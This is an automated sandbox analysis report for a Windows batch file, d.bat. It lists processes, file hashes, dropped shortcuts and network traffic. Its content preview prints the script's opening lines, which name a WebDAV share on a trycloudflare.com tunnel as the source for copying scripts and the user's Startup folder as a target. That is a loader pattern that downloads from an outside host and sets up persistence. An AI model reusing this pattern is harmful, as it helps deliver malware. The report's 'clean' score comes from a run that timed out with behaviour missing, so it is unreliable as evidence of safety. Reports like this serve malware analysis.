Windows
Analysis Report
d.bat
Overview
General Information
Detection
Score: | 3 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 80% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 1532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\d.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- chrome.exe (PID: 4036 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.irs.gov/pub/irs-pdf/f1040.pdf MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,8690622242313858414,1291820735043739184,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- cleanup
There are no malicious signatures.
Signature evidence rows (only the row labels survived extraction; the per-row values are not included):
- HTTP Parser: 2 rows
- HTTPS traffic detected: 4 rows
- IP Address: 1 row
- JA3 fingerprint: 1 row
- TCP traffic detected without corresponding DNS query: 50 rows
- HTTP traffic detected: 3 rows
- DNS traffic detected: 2 rows
- String found in binary or memory: 2 rows
- Network traffic detected: 17 rows
- HTTPS traffic detected: 4 rows
- Classification label: 1 row
- File created: 1 row
- Mutant created: 1 row
- Process created: 23 rows
- Section loaded: 32 rows
- LNK file: 6 rows
- Window detected: 1 row
- File created: 9 rows
- Process information set: 1 row
- Last function: 1 row
- Process created: 1 row
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
www.google.com | 142.250.9.104 | true | false | high | |
www.irs.gov | unknown | unknown | false | high |
Two further reputation tables (columns Name | Malicious | Antivirus Detection | Reputation, and Name | Source | Malicious | Antivirus Detection | Reputation) list entries whose names did not survive extraction; the surviving cells show Malicious: false and reputation values of high and low.
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
239.255.255.250 | unknown | Reserved | unknown | unknown | false |
142.250.9.104 | www.google.com | United States | 15169 | GOOGLEUS | false |
IP |
---|
192.168.2.5 |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1431649 |
Start date and time: | 2024-04-25 15:11:10 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 22s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | d.bat |
Detection: | CLEAN |
Classification: | clean3.winBAT@22/14@6/3 |
EGA Information: | Failed |
HCA Information: | |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 74.125.136.94, 23.223.135.219, 172.253.124.100, 172.253.124.101, 172.253.124.102, 172.253.124.138, 172.253.124.113, 172.253.124.139, 142.251.15.84, 34.104.35.123, 192.229.211.108, 199.232.214.172, 74.125.138.94, 23.40.205.49, 74.125.136.138, 74.125.136.139, 74.125.136.102, 74.125.136.100, 74.125.136.101, 74.125.136.113
- Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, www.irs.gov.edgekey.net, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e3920.dscna.akamaiedge.net, update.googleapis.com, clients.l.google.com
- Not all processes were analyzed; the report is missing behavior information
- Report size getting too big, too many NtOpenFile calls found.
Associated samples for match 239.255.255.250 (sample names, SHA-256 values and links did not survive extraction):
Detection | Threat Name |
---|---|
malicious | HTMLPhisher |
malicious | Unknown |
malicious | Unknown |
malicious | Unknown |
malicious | HTMLPhisher |
malicious | Unknown |
malicious | Unknown |
malicious | HTMLPhisher |
malicious | HtmlDropper, HTMLPhisher |
malicious | Unknown |
Associated samples for match 28a2c9bd18a11de089ef85a160da29e4 (sample names, SHA-256 values and links did not survive extraction):
Detection | Threat Name |
---|---|
malicious | Unknown |
malicious | Unknown |
malicious | Unknown |
malicious | Unknown |
malicious | HtmlDropper, HTMLPhisher |
malicious | Unknown |
malicious | Unknown |
malicious | Unknown |
malicious | Unknown |
malicious | Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2677 |
Entropy (8bit): | 3.979057681936079 |
Encrypted: | false |
SSDEEP: | 48:8SdTTbv/HfidAKZdA19ehwiZUklqehTy+3:86vZsy |
MD5: | DB39BFAB7983A1D0C19C7CD555B7F1F5 |
SHA1: | FCF24029FF1C651A6CFAB744EBFB5612330699C7 |
SHA-256: | 2DAAC444C93A503968274C3CECE2E69556315448AA4A04F46079592A19DB5681 |
SHA-512: | 33BD033BD074E127EE718116E10D1732939B2C078619910253DA3BC58550C467A7F39E858B2E8EC12B92A49D23D1DA1F3AC2311A80288939B7C34819772B3932 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2679 |
Entropy (8bit): | 3.9964520526391043 |
Encrypted: | false |
SSDEEP: | 48:8XdTTbv/HfidAKZdA1weh/iZUkAQkqehcy+2:8hvL9Qxy |
MD5: | 0B22EEDC6B1CCA6D3BB36C5BBB003281 |
SHA1: | 33AEA8DEEA16BD79F4D842A09EBC80FD3B4C48BD |
SHA-256: | 44F46499CA12F045F05C055D8954A40C7435D8A1BBA7A48748337511160BC2E8 |
SHA-512: | 8011B69C32DAFABD622256782F8F5FEB57516682EF36E0EAB3E0B8B54A8BCF8A3FAF81191CE8F0CA2A4887D8C9DE8508B60EBD99514FE9EF62DFB884C7D805F0 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2693 |
Entropy (8bit): | 4.005135031376133 |
Encrypted: | false |
SSDEEP: | 48:8xYdTTbvsHfidAKZdA14tseh7sFiZUkmgqeh7s6y+BX:8xkvenoy |
MD5: | 02D36C96E61D2D6DB3D1036FC17A3B41 |
SHA1: | B5EF61F0A62490E062FA117234B6B76D49F3129E |
SHA-256: | AF0B7FD9A2A4F737875881998AFBC6773CEEA3E15E0773A6E62B55E31A25017E |
SHA-512: | AB18C13A96040FF052347FB4FF9A73A62B0E9F24C43E952EF4F2C0A3887DF5B371F22DDA4FBDE3D7591F220E388A2C538B67502CC85E9EA14F2C598C8A34D604 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2681 |
Entropy (8bit): | 3.994808721032563 |
Encrypted: | false |
SSDEEP: | 48:83dTTbv/HfidAKZdA1vehDiZUkwqehQy+R:8BvIiy |
MD5: | 4A589436D7814F2752332896E780BCF6 |
SHA1: | 9DD685FDD5E2169FF8F6E091DF1ABD4567FC0E3D |
SHA-256: | 9788822CEC6318EFD8BDD6CA3B76A17A2B6EBE4920828263CC11D44FA6EE435F |
SHA-512: | C67503BF16E541890F0B60E0660C5B169C12CCC9D38D50995BF486780AFF012AEF0BFE9423528491B26137B5A25BF757FFBE549ECE3C08DCE73251D6C8EA0833 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2681 |
Entropy (8bit): | 3.982313351680813 |
Encrypted: | false |
SSDEEP: | 48:8VdTTbv/HfidAKZdA1hehBiZUk1W1qehWy+C:8bvY92y |
MD5: | E759CB25D380344C1C6A21399CF1AFDA |
SHA1: | D7C165407AD27C21C05EA4ED23E3BBCAAB1ABF75 |
SHA-256: | 3FD51442EF5B087FC9FB9151100F5640A9AD5CA372F474A05C6EB06DC13CD98C |
SHA-512: | 62567050358C6B29CA1032BFC1D984B549BA5028710CFF2D7A614D40ED4848E8D9080BA9CFF273EB63D3ED36A0D159AC3BE476DB018C43645A73D087828BECC6 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2683 |
Entropy (8bit): | 3.994975715439732 |
Encrypted: | false |
SSDEEP: | 48:8rdTTbv/HfidAKZdA1duT+ehOuTbbiZUk5OjqehOuTboy+yT+:8dv2T/TbxWOvTboy7T |
MD5: | 86A05180D598F0E54077A53792C74861 |
SHA1: | 6F363577612C01DAE4F2EF96E3A7EFAAD21AC16E |
SHA-256: | A08F1CB292EF7179B7D23D1E07CBDB46ED6C184C162F17F28CD91659273F5E5E |
SHA-512: | 9860870C5B40A4ABA4D60D890E143FF22C5FBBDCAD0CA0D9D28CCAFC42BC1B3E651E4764796008C247A5443AD5AF2FDBD5FE26420DFBD1C365EB44EB06B07623 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 160747 |
Entropy (8bit): | 7.666827256964284 |
Encrypted: | false |
SSDEEP: | 3072:H+GB66G6WwUTsiJM+5vz6ZDuteRPuZ3W11D84LCBUlWEHKr:eU66GwUTBMI+uQRPugjyUl7Hk |
MD5: | 5355B0C5DEB635C613B45246475123C2 |
SHA1: | F00B85A4367F18DCE9D521935AEFD8B7B091735B |
SHA-256: | A410CE39E1F9B75AB3DDD8C314B9E7DCE022ED6E3AEBDE5418A58B88F1E0213C |
SHA-512: | C31D5ACACE5FB498144290BA71DA016CF0E8CA38B85A026B77E62A1CA6AF5C21631B2836B624531FC43377DA54881FA6559395ED2A6883EA4582BC5ED7BF6278 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 160747 |
Entropy (8bit): | 7.666827256964284 |
Encrypted: | false |
SSDEEP: | 3072:H+GB66G6WwUTsiJM+5vz6ZDuteRPuZ3W11D84LCBUlWEHKr:eU66GwUTBMI+uQRPugjyUl7Hk |
MD5: | 5355B0C5DEB635C613B45246475123C2 |
SHA1: | F00B85A4367F18DCE9D521935AEFD8B7B091735B |
SHA-256: | A410CE39E1F9B75AB3DDD8C314B9E7DCE022ED6E3AEBDE5418A58B88F1E0213C |
SHA-512: | C31D5ACACE5FB498144290BA71DA016CF0E8CA38B85A026B77E62A1CA6AF5C21631B2836B624531FC43377DA54881FA6559395ED2A6883EA4582BC5ED7BF6278 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15750 |
Entropy (8bit): | 7.914947273324376 |
Encrypted: | false |
SSDEEP: | 384:/Pf8gkrYKx8cgfXuvsmVfvPfDlRESkV+2R/Ay9driE:/PobGB8HJ3fBGlB/pdeE |
MD5: | DC35DF0427D1F321441176368EBDAD93 |
SHA1: | 82CE46CEB10C5A6AA7308AF9A7418284C8251542 |
SHA-256: | 727B6B03E7996760F47669CC082083CB4FBAE095F5E3D33C98C1DB050F863359 |
SHA-512: | CF4D276439DE5929AB7E88472B6DB03DE9BE2D1D86860592D09351681C7DD0B8956AE59746F0D6564264732FDAB54D20B3632A0531F13D2A4ECB5C63DFFFD07A |
Malicious: | false |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3638 |
Entropy (8bit): | 2.571036536899412 |
Encrypted: | false |
SSDEEP: | 24:OeP3VnSOcrTxoncyUjvAZgX7a7VFYuq8oPhhr2EsCtIDOLrie:ObDrTxtyUn7WPYXBCs |
MD5: | E7E7D53FDBC59F9B23B362F41FAD8990 |
SHA1: | EBA944D3003861B1E114D8997C2979B003F68087 |
SHA-256: | 6D63881E43E08EF385E6C809B43B2B289A459FB2F30D5159000E2477D776B456 |
SHA-512: | 8ADED0EC6D8F1118CE33479CB16F60A9115948CF09C57DA38292E24DE13B3B5C3942B8E6AEC82769C555FB22BFCB1F91E773C4673E7B6A34F5701EFF0397E259 |
Malicious: | false |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 3638 |
Entropy (8bit): | 2.571036536899412 |
Encrypted: | false |
SSDEEP: | 24:OeP3VnSOcrTxoncyUjvAZgX7a7VFYuq8oPhhr2EsCtIDOLrie:ObDrTxtyUn7WPYXBCs |
MD5: | E7E7D53FDBC59F9B23B362F41FAD8990 |
SHA1: | EBA944D3003861B1E114D8997C2979B003F68087 |
SHA-256: | 6D63881E43E08EF385E6C809B43B2B289A459FB2F30D5159000E2477D776B456 |
SHA-512: | 8ADED0EC6D8F1118CE33479CB16F60A9115948CF09C57DA38292E24DE13B3B5C3942B8E6AEC82769C555FB22BFCB1F91E773C4673E7B6A34F5701EFF0397E259 |
Malicious: | false |
URL: | https://www.irs.gov/themes/custom/pup_base/favicon.ico |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 160747 |
Entropy (8bit): | 7.666827256964284 |
Encrypted: | false |
SSDEEP: | 3072:H+GB66G6WwUTsiJM+5vz6ZDuteRPuZ3W11D84LCBUlWEHKr:eU66GwUTBMI+uQRPugjyUl7Hk |
MD5: | 5355B0C5DEB635C613B45246475123C2 |
SHA1: | F00B85A4367F18DCE9D521935AEFD8B7B091735B |
SHA-256: | A410CE39E1F9B75AB3DDD8C314B9E7DCE022ED6E3AEBDE5418A58B88F1E0213C |
SHA-512: | C31D5ACACE5FB498144290BA71DA016CF0E8CA38B85A026B77E62A1CA6AF5C21631B2836B624531FC43377DA54881FA6559395ED2A6883EA4582BC5ED7BF6278 |
Malicious: | false |
URL: | https://www.irs.gov/pub/irs-pdf/f1040.pdf |
File type: | |
Entropy (8bit): | 5.00221025750802 |
TrID: | |
File name: | d.bat |
File size: | 1'493 bytes |
MD5: | ff72478478ffdc769b1e68ebcae78ce7 |
SHA1: | de0dcdc73c62b379b197f85665d0f79ffd503e8c |
SHA256: | 37078a400954db8edd7717afb95f22d7fe119efedc4691bff4e7ca2470ece1c8 |
SHA512: | ca5cb63cbc5661189d3c5191ce1d4b28f29496839a9a7cf31948141cec7e34e0aa7054e94c409fb8dfc900531516b9946f17c3764cb4224c5e4bce0616f368ff |
SSDEEP: | 24:wh280zOMKuVMVxRbzrpQJkqgqy5eiQr9K5Hk0hSMXgGaOM+1wcTxnIdK9/ZDjeFv:k28qNKu6dpQJkq31jhK558TGeslxnIdr |
TLSH: | 653103521808413A4337A7BAB73859EEE50A504FD200751975EDC5B60F3528DC7B6BE4 |
Icon Hash: | 9686878b929a9886 |
File Content Preview (the `..` sequences in the sandbox preview are the script's CRLF line breaks; the preview ends at the REM line):
```batch
@echo off
set source=\\hq-breach-alt-acknowledged.trycloudflare.com@SSL\DavWWWRoot
set destination=%USERPROFILE%\Pictures
set startup_folder=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

REM Copy a.cmd, a.ps1, and ib.ps1 to the destination
```
The surviving lines name a WebDAV share reached through a trycloudflare.com tunnel (the `@SSL\DavWWWRoot` path) as the copy source and the user's Startup folder as one of the targets; the process tree above shows none of the named scripts running, and the analysis stopped on timeout with behavior information missing (see Cookbook Comments), so the clean score was produced by an incomplete run.
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 25, 2024 15:12:07.094077110 CEST | 49675 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:07.094077110 CEST | 49674 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:07.203501940 CEST | 49673 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:16.706228971 CEST | 49675 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:16.706229925 CEST | 49674 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:16.811434984 CEST | 49673 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:17.735681057 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.735760927 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:17.735836029 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.736057997 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.736093998 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:17.979747057 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:17.980123997 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.980160952 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:17.981527090 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:17.981580019 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.982920885 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.982990980 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:18.103143930 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:18.103188992 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:18.122967005 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.123029947 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.123106956 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.125169039 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.125205994 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.181680918 CEST | 443 | 49703 | 23.1.237.91 | 192.168.2.5 |
Apr 25, 2024 15:12:18.181787014 CEST | 49703 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:18.212440968 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:18.361244917 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.361368895 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.364238977 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.364262104 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.364670992 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.408225060 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.421142101 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.468147039 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.570722103 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.570868969 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.570986986 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.571048021 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.571048021 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.571086884 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.571125984 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.615158081 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.615210056 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.615410089 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.615945101 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.615961075 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.844990969 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.845079899 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.860052109 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.860079050 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.860424042 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.861485004 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.908118963 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:19.063371897 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:19.063433886 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:19.063513994 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:19.064230919 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:19.064256907 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:19.064270973 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:19.064280033 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:27.958633900 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:27.958703995 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:27.958787918 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:28.953175068 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:28.953247070 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:29.321106911 CEST | 49703 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:29.360703945 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:29.360738039 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:29.360829115 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:29.362056017 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:29.362066984 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:29.478749037 CEST | 443 | 49703 | 23.1.237.91 | 192.168.2.5 |
Apr 25, 2024 15:12:29.798821926 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:29.798944950 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:29.802061081 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:29.802072048 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:29.802372932 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:29.880506992 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.268882036 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.316123962 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552180052 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552202940 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552210093 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552228928 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552254915 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552254915 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.552262068 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552294970 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552314997 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.552352905 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.552375078 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552459955 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.552465916 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552475929 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552515984 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.570635080 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.570650101 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.570672035 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.570678949 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:16.812021971 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:16.812061071 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:16.812151909 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:16.812463045 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:16.812480927 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.246655941 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
